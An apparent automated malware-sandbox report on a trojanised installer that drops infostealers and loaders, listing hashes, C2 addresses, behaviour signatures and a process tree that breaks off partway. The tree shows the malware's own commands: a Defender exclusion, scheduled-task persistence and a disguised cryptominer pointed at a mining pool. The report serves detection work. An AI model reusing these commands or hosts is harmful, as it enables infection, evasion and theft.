Overview

overview

10

Static

static

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows7_x64

10

setup_x86_...ll.exe

windows11_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

setup_x86_...ll.exe

windows10_x64

10

Resubmissions

23-09-2021 21:08

210923-zyzyaafbfr 10

22-09-2021 10:40

210922-mqyzssehck 10

22-09-2021 05:21

210922-f114ksecck 10

21-09-2021 05:29

210921-f6zspsgdg2 10

20-09-2021 21:51

210920-1qj3jafed9 10

20-09-2021 19:44

210920-yftswafca9 10

20-09-2021 08:28

210920-kczcasgahr 10

20-09-2021 04:42

210920-fb3acafedj 10

20-09-2021 04:42

210920-fb2zksfecr 10

Analysis

  • max time kernel
    1802s
  • max time network
    1806s
  • platform
    windows10_x64
  • resource
    win10-de-20210920
  • submitted
    23-09-2021 21:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.0MB

  • MD5

    73491325fde5366b31c09da701d07dd6

  • SHA1

    a4e1ada57e590c2df30fc26fad5f3ca57ad922b1

  • SHA256

    56a461a6cc8ad9c10cdc1d19a12d5deceb9ebefb0c871a3fc2eb83c466947a11

  • SHA512

    28b5008c542e9c486529934f74774d6d2de4b98531483b24c3c7cf82bf2214b959a1feb0085014026dd278d2a18ac6ae8a0e5a7ebb36be28abf6dccbf2d38e88

Score
10/10
redlinesmokeloadersocelarsvidar706janesamaspackv2backdoordiscoveryevasioninfostealerpersistencespywarestealersuricatatrojan

Malware Config

Extracted

Family

vidar

Version

40.7

Botnet

706

C2

https://petrenko96.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

redline

Botnet

janesam

C2

65.108.20.195:6774

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/
rc4.i32
rc4.i32

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata
  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata
  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata
  • suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity

    suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity

    suricata
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

    evasion
  • Vidar Stealer 2 IoCs
    stealer
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Blocklisted process makes network request 48 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 46 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 37 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 16 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Drops file in Windows directory 52 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 16 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 7 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 20 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
    evasionspywaretrojan
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SetWindowsHookEx 17 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:396
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
      1⤵
        PID:1160
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
        1⤵
        • Drops file in System32 directory
        PID:1064
        • C:\Users\Admin\AppData\Roaming\iwwbgde
          C:\Users\Admin\AppData\Roaming\iwwbgde
          2⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:5056
        • C:\Users\Admin\AppData\Roaming\iwwbgde
          C:\Users\Admin\AppData\Roaming\iwwbgde
          2⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:4068
        • C:\Users\Admin\AppData\Roaming\iwwbgde
          C:\Users\Admin\AppData\Roaming\iwwbgde
          2⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious behavior: MapViewOfSection
          PID:2436
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Themes
        1⤵
          PID:1176
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s BITS
          1⤵
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          PID:4688
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k SystemNetworkService
            2⤵
            • Drops file in System32 directory
            • Checks processor information in registry
            • Modifies data under HKEY_USERS
            • Modifies registry class
            PID:2616
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
          1⤵
            PID:2696
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
            1⤵
              PID:2676
              • C:\Windows\system32\wbem\WMIADAP.EXE
                wmiadap.exe /F /T /R
                2⤵
                  PID:3040
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Browser
                1⤵
                  PID:2548
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                  1⤵
                    PID:2404
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                    1⤵
                      PID:2384
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                      1⤵
                        PID:1860
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s SENS
                        1⤵
                          PID:1412
                        • c:\windows\system32\svchost.exe
                          c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                          1⤵
                            PID:1392
                          • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                            "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3708
                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                              "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:3440
                              • C:\Users\Admin\AppData\Local\Temp\7zS07D528B2\setup_install.exe
                                "C:\Users\Admin\AppData\Local\Temp\7zS07D528B2\setup_install.exe"
                                3⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of WriteProcessMemory
                                PID:1728
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                  4⤵
                                    PID:4512
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                      5⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2060
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Sun1917b8fb5f09db8.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:4408
                                    • C:\Users\Admin\AppData\Local\Temp\7zS07D528B2\Sun1917b8fb5f09db8.exe
                                      Sun1917b8fb5f09db8.exe
                                      5⤵
                                      • Executes dropped EXE
                                      PID:668
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:776
                                    • C:\Users\Admin\AppData\Local\Temp\7zS07D528B2\Sun193fda712d9f1.exe
                                      Sun193fda712d9f1.exe
                                      5⤵
                                      • Executes dropped EXE
                                      PID:336
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:412
                                    • C:\Users\Admin\AppData\Local\Temp\7zS07D528B2\Sun19e4ade31b2a.exe
                                      Sun19e4ade31b2a.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:536
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe
                                    4⤵
                                      PID:4384
                                      • C:\Users\Admin\AppData\Local\Temp\7zS07D528B2\Sun19262b9e49ad.exe
                                        Sun19262b9e49ad.exe
                                        5⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2432
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c taskkill /f /im chrome.exe
                                          6⤵
                                            PID:3912
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im chrome.exe
                                              7⤵
                                              • Kills process with taskkill
                                              PID:5356
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:4520
                                        • C:\Users\Admin\AppData\Local\Temp\7zS07D528B2\Sun1908b94df837b3158.exe
                                          Sun1908b94df837b3158.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Checks SCSI registry key(s)
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious behavior: MapViewOfSection
                                          PID:888
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:3700
                                        • C:\Users\Admin\AppData\Local\Temp\7zS07D528B2\Sun191101c1aaa.exe
                                          Sun191101c1aaa.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:944
                                          • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                            "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            PID:4124
                                            • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                              7⤵
                                              • Executes dropped EXE
                                              PID:3488
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                8⤵
                                                  PID:6328
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                    9⤵
                                                    • Creates scheduled task(s)
                                                    PID:6568
                                                • C:\Users\Admin\AppData\Roaming\services64.exe
                                                  "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                  8⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:7108
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                    9⤵
                                                      PID:6612
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                        10⤵
                                                        • Creates scheduled task(s)
                                                        PID:6640
                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                      9⤵
                                                      • Executes dropped EXE
                                                      PID:4192
                                                    • C:\Windows\explorer.exe
                                                      C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                      9⤵
                                                        PID:6880
                                                  • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4424
                                                  • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2984
                                                  • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:732
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 732 -s 808
                                                      8⤵
                                                      • Program crash
                                                      PID:1204
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 732 -s 840
                                                      8⤵
                                                      • Executes dropped EXE
                                                      • Program crash
                                                      PID:4852
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 732 -s 900
                                                      8⤵
                                                      • Program crash
                                                      PID:5168
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 732 -s 964
                                                      8⤵
                                                      • Program crash
                                                      PID:5384
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 732 -s 996
                                                      8⤵
                                                      • Program crash
                                                      PID:5616
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 732 -s 1140
                                                      8⤵
                                                      • Program crash
                                                      PID:5740
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 732 -s 1168
                                                      8⤵
                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                      • Program crash
                                                      PID:5900
                                                  • C:\Users\Admin\AppData\Local\Temp\udptest.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:3804
                                                  • C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1300
                                                  • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2672
                                                    • C:\Windows\system32\WerFault.exe
                                                      C:\Windows\system32\WerFault.exe -u -p 2672 -s 1568
                                                      8⤵
                                                      • Program crash
                                                      PID:3412
                                                  • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:4120
                                                    • C:\Users\Admin\AppData\Local\Temp\is-SLLOE.tmp\setup_2.tmp
                                                      "C:\Users\Admin\AppData\Local\Temp\is-SLLOE.tmp\setup_2.tmp" /SL5="$10258,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                      8⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      PID:4456
                                                      • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                        9⤵
                                                        • Executes dropped EXE
                                                        PID:2096
                                                        • C:\Users\Admin\AppData\Local\Temp\is-20NAA.tmp\setup_2.tmp
                                                          "C:\Users\Admin\AppData\Local\Temp\is-20NAA.tmp\setup_2.tmp" /SL5="$30112,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                          10⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          PID:2020
                                                  • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:2128
                                                  • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                    7⤵
                                                      PID:4852
                                                      • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                        8⤵
                                                        • Executes dropped EXE
                                                        PID:4416
                                                    • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                      7⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4332
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe
                                                4⤵
                                                  PID:4348
                                                  • C:\Users\Admin\AppData\Local\Temp\7zS07D528B2\Sun1905815e51282417.exe
                                                    Sun1905815e51282417.exe
                                                    5⤵
                                                    • Executes dropped EXE
                                                    PID:1792
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe
                                                  4⤵
                                                    PID:3116
                                                    • C:\Users\Admin\AppData\Local\Temp\7zS07D528B2\Sun1966fb31dd5a07.exe
                                                      Sun1966fb31dd5a07.exe
                                                      5⤵
                                                      • Executes dropped EXE
                                                      PID:2428
                                                      • C:\Users\Admin\AppData\Local\Temp\is-L8HT1.tmp\Sun1966fb31dd5a07.tmp
                                                        "C:\Users\Admin\AppData\Local\Temp\is-L8HT1.tmp\Sun1966fb31dd5a07.tmp" /SL5="$301F4,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS07D528B2\Sun1966fb31dd5a07.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:4160
                                                        • C:\Users\Admin\AppData\Local\Temp\is-A1KIF.tmp\Ze2ro.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\is-A1KIF.tmp\Ze2ro.exe" /S /UID=burnerch2
                                                          7⤵
                                                          • Drops file in Drivers directory
                                                          • Executes dropped EXE
                                                          • Adds Run key to start application
                                                          • Drops file in Program Files directory
                                                          PID:608
                                                          • C:\Program Files\Windows Photo Viewer\TBWLNYCWXU\ultramediaburner.exe
                                                            "C:\Program Files\Windows Photo Viewer\TBWLNYCWXU\ultramediaburner.exe" /VERYSILENT
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:5520
                                                            • C:\Users\Admin\AppData\Local\Temp\is-8IGN7.tmp\ultramediaburner.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-8IGN7.tmp\ultramediaburner.tmp" /SL5="$20348,281924,62464,C:\Program Files\Windows Photo Viewer\TBWLNYCWXU\ultramediaburner.exe" /VERYSILENT
                                                              9⤵
                                                              • Executes dropped EXE
                                                              • Drops file in Program Files directory
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:5560
                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                10⤵
                                                                • Executes dropped EXE
                                                                PID:3844
                                                          • C:\Users\Admin\AppData\Local\Temp\9b-4c417-53e-1359a-bb84ec6b2d77a\Dafybaejasae.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\9b-4c417-53e-1359a-bb84ec6b2d77a\Dafybaejasae.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            • Checks computer location settings
                                                            PID:5576
                                                          • C:\Users\Admin\AppData\Local\Temp\c1-a5fc7-b1c-c4faa-286a8450c6111\Gewokuguwo.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\c1-a5fc7-b1c-c4faa-286a8450c6111\Gewokuguwo.exe"
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:1216
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ypk3eh0b.ug3\GcleanerEU.exe /eufive & exit
                                                              9⤵
                                                                PID:6196
                                                                • C:\Users\Admin\AppData\Local\Temp\ypk3eh0b.ug3\GcleanerEU.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\ypk3eh0b.ug3\GcleanerEU.exe /eufive
                                                                  10⤵
                                                                  • Executes dropped EXE
                                                                  PID:6832
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b1xohwfh.h0f\installer.exe /qn CAMPAIGN="654" & exit
                                                                9⤵
                                                                  PID:6468
                                                                  • C:\Users\Admin\AppData\Local\Temp\b1xohwfh.h0f\installer.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\b1xohwfh.h0f\installer.exe /qn CAMPAIGN="654"
                                                                    10⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Enumerates connected drives
                                                                    • Modifies system certificate store
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:6784
                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\b1xohwfh.h0f\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\b1xohwfh.h0f\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632431142 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                      11⤵
                                                                        PID:5812
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fjqpxrvi.lhx\anyname.exe & exit
                                                                    9⤵
                                                                      PID:7044
                                                                      • C:\Users\Admin\AppData\Local\Temp\fjqpxrvi.lhx\anyname.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\fjqpxrvi.lhx\anyname.exe
                                                                        10⤵
                                                                        • Executes dropped EXE
                                                                        PID:3172
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ezaxcxpn.1pk\customer2.exe & exit
                                                                      9⤵
                                                                        PID:4640
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yiojyzgj.yk3\gcleaner.exe /mixfive & exit
                                                                        9⤵
                                                                          PID:3336
                                                                          • C:\Users\Admin\AppData\Local\Temp\yiojyzgj.yk3\gcleaner.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\yiojyzgj.yk3\gcleaner.exe /mixfive
                                                                            10⤵
                                                                            • Executes dropped EXE
                                                                            PID:896
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m2qwfpke.4jj\autosubplayer.exe /S & exit
                                                                          9⤵
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:5824
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:4192
                                                                • C:\Users\Admin\AppData\Local\Temp\7zS07D528B2\Sun195a1614ec24e6a.exe
                                                                  Sun195a1614ec24e6a.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:988
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c Sun198361825f4.exe
                                                                4⤵
                                                                  PID:3992
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS07D528B2\Sun198361825f4.exe
                                                                    Sun198361825f4.exe
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1420
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe
                                                                  4⤵
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:3848
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS07D528B2\Sun19eb40faaaa9.exe
                                                                    Sun19eb40faaaa9.exe
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:1336
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 1616
                                                                      6⤵
                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                      • Drops file in Windows directory
                                                                      • Program crash
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:664
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone
                                                                  4⤵
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:3216
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS07D528B2\Sun19de8ff4b6aefeb8.exe
                                                                    Sun19de8ff4b6aefeb8.exe /mixone
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:1224
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 656
                                                                      6⤵
                                                                      • Program crash
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3640
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 672
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:2400
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 724
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:5144
                                                                    • C:\Windows\SysWOW64\WerFault.exe
